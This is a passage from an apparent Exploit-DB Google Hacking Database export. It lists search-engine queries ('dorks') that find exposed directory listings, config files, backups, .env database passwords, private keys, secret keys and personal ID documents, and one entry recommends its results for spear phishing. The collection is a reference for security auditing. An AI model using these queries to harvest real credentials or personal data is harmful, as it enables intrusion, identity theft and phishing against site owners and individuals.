<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;infophp()&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;infophp()&quot;
# Files Containing Juicy Info
# Date: 08/11/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;infophp()&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;infophp()&quot;</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7999</id>
<link>https://www.exploit-db.com/ghdb/7999</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;ipaddress&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;ipaddress&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;ipaddress&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;ipaddress&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7996</id>
<link>https://www.exploit-db.com/ghdb/7996</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;phonepe&quot; &quot;wp-content&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;phonepe&quot; &quot;wp-content&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;phonepe&quot; &quot;wp-content&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;phonepe&quot; &quot;wp-content&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8054</id>
<link>https://www.exploit-db.com/ghdb/8054</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;phpinfo&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;phpinfo&quot;
# Files Containing Juicy Info
# Date:07/02/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;phpinfo&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;phpinfo&quot;</querystring>
<edb></edb>
<date>2023-02-07</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8294</id>
<link>https://www.exploit-db.com/ghdb/8294</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;phpinfo&quot; site:*.in</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;phpinfo&quot; site:*.in
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Soriful Islam</textualDescription>
<query>intext:&quot;index of&quot; &quot;phpinfo&quot; site:*.in</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;phpinfo&quot; site:*.in</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Soriful Islam</author>
</entry>
<entry>
<id>8056</id>
<link>https://www.exploit-db.com/ghdb/8056</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;phpMyAdmin&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;phpMyAdmin&quot;
# Files Containing Juicy Info
# Date:07/02/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;phpMyAdmin&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;phpMyAdmin&quot;</querystring>
<edb></edb>
<date>2023-02-07</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8360</id>
<link>https://www.exploit-db.com/ghdb/8360</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;pins&quot; site:*.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;pins&quot; site:*.com
# Files Containing Juicy Info
# Date: 27/11/2023
# Exploit: Omkar Chavan</textualDescription>
<query>intext:&quot;index of&quot; &quot;pins&quot; site:*.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;pins&quot; site:*.com</querystring>
<edb></edb>
<date>2023-11-27</date>
<author>Omkar Chavan</author>
</entry>
<entry>
<id>7993</id>
<link>https://www.exploit-db.com/ghdb/7993</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;repository&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;repository&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;repository&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;repository&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7684</id>
<link>https://www.exploit-db.com/ghdb/7684</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; &quot;services.php | pass.php | passwd.php | credentials.txt&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; &quot;services.php | pass.php | passwd.php | credentials.txt&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Parshwa Bhavsar</textualDescription>
<query>intext:&quot;Index of&quot; &quot;services.php | pass.php | passwd.php | credentials.txt&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; &quot;services.php | pass.php | passwd.php | credentials.txt&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Parshwa Bhavsar</author>
</entry>
<entry>
<id>7674</id>
<link>https://www.exploit-db.com/ghdb/7674</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;signin&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;signin&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;index of&quot; &quot;signin&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;signin&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7994</id>
<link>https://www.exploit-db.com/ghdb/7994</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;transaction&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;transaction&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intext:&quot;index of&quot; &quot;transaction&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;transaction&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7659</id>
<link>https://www.exploit-db.com/ghdb/7659</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;user-config&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;user-config&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intext:&quot;index of&quot; &quot;user-config&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;user-config&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>8104</id>
<link>https://www.exploit-db.com/ghdb/8104</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;wp-content.zip&quot;
# Files Containing Juicy Info
# Date:09/03/2023
# Exploit Author: Sharique Raza</textualDescription>
<query>intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;wp-content.zip&quot; - Files Containing Juicy Info</querystring>
<edb></edb>
<date>2023-03-09</date>
<author>Sharique Raza</author>
</entry>
<entry>
<id>7673</id>
<link>https://www.exploit-db.com/ghdb/7673</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;wp-uploads&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;wp-uploads&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intext:&quot;index of&quot; &quot;wp-uploads&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;wp-uploads&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>8055</id>
<link>https://www.exploit-db.com/ghdb/8055</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; &quot;xmlrpc.php&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;xmlrpc.php&quot;
# Files Containing Juicy Info
# Date:07/02/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;xmlrpc.php&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;xmlrpc.php&quot;</querystring>
<edb></edb>
<date>2023-02-07</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8135</id>
<link>https://www.exploit-db.com/ghdb/8135</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; downloads&quot; site:*.*</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; downloads&quot; site:*.*
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Monirul Islam</textualDescription>
<query>intext:&quot;index of&quot; downloads&quot; site:*.*</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; downloads&quot; site:*.*</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Monirul Islam</author>
</entry>
<entry>
<id>8166</id>
<link>https://www.exploit-db.com/ghdb/8166</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;/etc&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;/etc&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;/etc&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8163</id>
<link>https://www.exploit-db.com/ghdb/8163</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backend/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backend/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backend/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8161</id>
<link>https://www.exploit-db.com/ghdb/8161</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;backup.tar&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>8165</id>
<link>https://www.exploit-db.com/ghdb/8165</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;bitbucket-pipelines.yml&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>7717</id>
<link>https://www.exploit-db.com/ghdb/7717</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;config.zip&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;config.zip&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Parth Surati</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;config.zip&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;config.zip&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Parth Surati</author>
</entry>
<entry>
<id>8164</id>
<link>https://www.exploit-db.com/ghdb/8164</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;plugin/&quot;
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;plugin/&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry>
<id>7683</id>
<link>https://www.exploit-db.com/ghdb/7683</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;users.zip&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;users.zip&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Parshwa Bhavsar</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;users.zip&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;users.zip&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Parshwa Bhavsar</author>
</entry>
<entry>
<id>7668</id>
<link>https://www.exploit-db.com/ghdb/7668</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; inurl:/etc/</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; inurl:/etc/
# Files Containing Juicy Info
# Date:7/11/2021
# Exploit Author: Sandesh Ajgekar</textualDescription>
<query>intext:&quot;index of&quot; inurl:/etc/</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:/etc/</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Sandesh Ajgekar</author>
</entry>
<entry>
<id>8179</id>
<link>https://www.exploit-db.com/ghdb/8179</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; inurl:json-rpc</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; inurl:json-rpc
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intext:&quot;index of&quot; inurl:json-rpc</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:json-rpc</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8177</id>
<link>https://www.exploit-db.com/ghdb/8177</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; inurl:jwks-rsa</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; inurl:jwks-rsa
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intext:&quot;index of&quot; inurl:jwks-rsa</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:jwks-rsa</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>8370</id>
<link>https://www.exploit-db.com/ghdb/8370</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; server.conf</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; server.conf
# Files Containing Juicy Info
# Date: 04/12/2023
# Exploit: saurabh kode</textualDescription>
<query>intext:&quot;index of&quot; server.conf</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; server.conf</querystring>
<edb></edb>
<date>2023-12-04</date>
<author>saurabh kode</author>
</entry>
<entry>
<id>8106</id>
<link>https://www.exploit-db.com/ghdb/8106</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot; smb.conf</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; smb.conf
# Files Containing Juicy Info
# Date:13/03/2023
# Exploit Author: Konaté Olivier</textualDescription>
<query>intext:&quot;index of&quot; smb.conf</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; smb.conf</querystring>
<edb></edb>
<date>2023-03-13</date>
<author>Konaté Olivier</author>
</entry>
<entry>
<id>8374</id>
<link>https://www.exploit-db.com/ghdb/8374</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of&quot;store</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot;store
# Files Containing Juicy Info
# Date: 06/12/2023
# Exploit: saurabh kode</textualDescription>
<query>intext:&quot;index of&quot;store</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot;store</querystring>
<edb></edb>
<date>2023-12-06</date>
<author>saurabh kode</author>
</entry>
<entry>
<id>7425</id>
<link>https://www.exploit-db.com/ghdb/7425</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of/&quot; &quot;client-1.0-SNAPSHOT&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of/&quot; &quot;client-1.0-SNAPSHOT&quot;
# Files Containing Juicy Info
# Date:12/10/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intext:&quot;index of/&quot; &quot;client-1.0-SNAPSHOT&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of/&quot; &quot;client-1.0-SNAPSHOT&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7452</id>
<link>https://www.exploit-db.com/ghdb/7452</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;index of/&quot; &quot;top secret&quot; gov</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of/&quot; &quot;top secret&quot; gov
# Files Containing Juicy Info
# Date:15/10/2021
# Exploit Author: Syed Sadam</textualDescription>
<query>intext:&quot;index of/&quot; &quot;top secret&quot; gov</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of/&quot; &quot;top secret&quot; gov</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Syed Sadam</author>
</entry>
<entry>
<id>5990</id>
<link>https://www.exploit-db.com/ghdb/5990</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;laravel&quot; ext:env intext:&quot;db_password&quot; -git</shortDescription>
<textualDescription># Google Dork: intext:&quot;laravel&quot; ext:env intext:&quot;db_password&quot; -git
# Laravel Database credentials.
# Date: 1/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;laravel&quot; ext:env intext:&quot;db_password&quot; -git</query>
<querystring>https://www.google.com/search?q=intext:&quot;laravel&quot; ext:env intext:&quot;db_password&quot; -git</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4186</id>
<link>https://www.exploit-db.com/ghdb/4186</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Microsoft(R) Server Maintenance Utility (Unicode)&quot; ext:txt</shortDescription>
<textualDescription>Details:
Search result shows Txt files. Text files contains database information+server path disclosure+different db queries.
(¯`·._.·[ Silent_Z3R0 ]·._.·´¯)(¯`·._.·[ Pak Cyber Army ]·._.·´¯)</textualDescription>
<query>intext:&quot;Microsoft(R) Server Maintenance Utility (Unicode)&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;Microsoft(R) Server Maintenance Utility (Unicode)&quot; ext:txt</querystring>
<edb></edb>
<date>2016-01-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6303</id>
<link>https://www.exploit-db.com/ghdb/6303</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Not to be distributed&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</shortDescription>
<textualDescription># Google Dork: intext:&quot;Not to be distributed&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx
# Sensitive stuff.
# Date: 17/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Not to be distributed&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</query>
<querystring>https://www.google.com/search?q=intext:&quot;Not to be distributed&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7357</id>
<link>https://www.exploit-db.com/ghdb/7357</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Number of Requests for items accessed on this Server&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Number of Requests for items accessed on this Server&quot;
# Files Containing Juicy Info
# Date:30/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intext:&quot;Number of Requests for items accessed on this Server&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Number of Requests for items accessed on this Server&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7484</id>
<link>https://www.exploit-db.com/ghdb/7484</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;password&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;password&quot; intitle:&quot;index of&quot;
# Files Containing Juicy Info
# Date:23/10/2021
# Exploit Author: Morsheduzzaman Arman</textualDescription>
<query>intext:&quot;password&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;password&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Morsheduzzaman Arman</author>
</entry>
<entry>
<id>7598</id>
<link>https://www.exploit-db.com/ghdb/7598</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:anonfiles.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:anonfiles.com
# Date: 04/11/2021
# Files Containing Juicy Info
# Exploit Author: Nisrin Ahmed</textualDescription>
<query>intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:anonfiles.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:anonfiles.com</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Nisrin Ahmed</author>
</entry>
<entry>
<id>4936</id>
<link>https://www.exploit-db.com/ghdb/4936</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;PHP Version &quot; ext:php intext:&quot;disabled&quot; intext:&quot;Build Date&quot; intext:&quot;System&quot; intext:&quot;allow_url_fopen&quot;</shortDescription>
<textualDescription>Exploit Title: Finds phpinfo() pages that are not tied to extensions or file types.
Google Dork: intext:&quot;PHP Version &quot; ext:php intext:&quot;disabled&quot; intext:&quot;Build Date&quot; intext:&quot;System&quot; intext:&quot;allow_url_fopen&quot;
Date: 9-1-2018
Exploit Author: hehnope</textualDescription>
<query>intext:&quot;PHP Version &quot; ext:php intext:&quot;disabled&quot; intext:&quot;Build Date&quot; intext:&quot;System&quot; intext:&quot;allow_url_fopen&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;PHP Version &quot; ext:php intext:&quot;disabled&quot; intext:&quot;Build Date&quot; intext:&quot;System&quot; intext:&quot;allow_url_fopen&quot;</querystring>
<edb></edb>
<date>2018-09-04</date>
<author>hehnope</author>
</entry>
<entry>
<id>4964</id>
<link>https://www.exploit-db.com/ghdb/4964</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;please find attached&quot; &quot;login&quot; | password ext:pdf</shortDescription>
<textualDescription>Passwords and information on target's employees/customers. awesome for
spear phishing.
Replace pdf extension with any other document extension like doc, docx,
txt...
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;please find attached&quot; &quot;login&quot; | password ext:pdf</query>
<querystring>https://www.google.com/search?q=intext:&quot;please find attached&quot; &quot;login&quot; | password ext:pdf</querystring>
<edb></edb>
<date>2018-09-26</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5095</id>
<link>https://www.exploit-db.com/ghdb/5095</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Portador do CPF&quot;</shortDescription>
<textualDescription>Sensitive personal information.
Alisson Moretto
undeadsec.com</textualDescription>
<query>intext:&quot;Portador do CPF&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Portador do CPF&quot;</querystring>
<edb></edb>
<date>2019-02-11</date>
<author>Alisson Moretto</author>
</entry>
<entry>
<id>7309</id>
<link>https://www.exploit-db.com/ghdb/7309</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Powered by SmarterTrack&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by SmarterTrack&quot;
# Files Containing Juicy Info
# Date:24/09/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>intext:&quot;Powered by SmarterTrack&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by SmarterTrack&quot;</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>7334</id>
<link>https://www.exploit-db.com/ghdb/7334</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Powered by YzmCMS&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by YzmCMS&quot;
# Files Containing Juicy Info
# Date:27/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;Powered by YzmCMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by YzmCMS&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7245</id>
<link>https://www.exploit-db.com/ghdb/7245</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;private_key=&quot; site:pastebin.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;private_key=&quot; site:pastebin.com
# Files Containing Juicy Info
# Date: 24/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;private_key=&quot; site:pastebin.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;private_key=&quot; site:pastebin.com</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8353</id>
<link>https://www.exploit-db.com/ghdb/8353</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Reportico&quot; site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu</shortDescription>
<textualDescription># Google Dork: intext:&quot;Reportico&quot; site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu
# Files Containing Juicy Info
# Date: 23/11/2023
# Exploit: Aashiq Ahamed</textualDescription>
<query>intext:&quot;Reportico&quot; site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu</query>
<querystring>https://www.google.com/search?q=intext:&quot;Reportico&quot; site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu</querystring>
<edb></edb>
<date>2023-11-23</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>5002</id>
<link>https://www.exploit-db.com/ghdb/5002</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;Resource dumped by&quot; intext:jcr -site:adobe.com</shortDescription>
<textualDescription>This request shows a Find useful information about Adobe AEM-CQ
implementation
DORK: intext:&quot;Resource dumped by&quot; intext:jcr -site:adobe.com
Cheers. Sh3llb0y
</textualDescription>
<query>intext:&quot;Resource dumped by&quot; intext:jcr -site:adobe.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Resource dumped by&quot; intext:jcr -site:adobe.com</querystring>
<edb></edb>
<date>2018-10-29</date>
<author>Sh3llb0y</author>
</entry>
<entry>
<id>5736</id>
<link>https://www.exploit-db.com/ghdb/5736</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:&quot;SECRET_KEY&quot; ext|py inurl:mysite -site:stackoverflow.com -site:github.com</shortDescription>
<textualDescription>Dork:
intext:&quot;SECRET_KEY&quot; ext|py inurl:mysite -site:stackoverflow.com -site:github.com
Description:
This dork queries google and finds the SECRET_KEY within python source code for django, focusing on mysite url.
Category:
Files Containing Juicy Info.
Author:
JadeWolf</textualDescription>
<query>intext:&quot;SECRET_KEY&quot; ext|py inurl:mysite -site:stackoverflow.com -site:github.com</query>
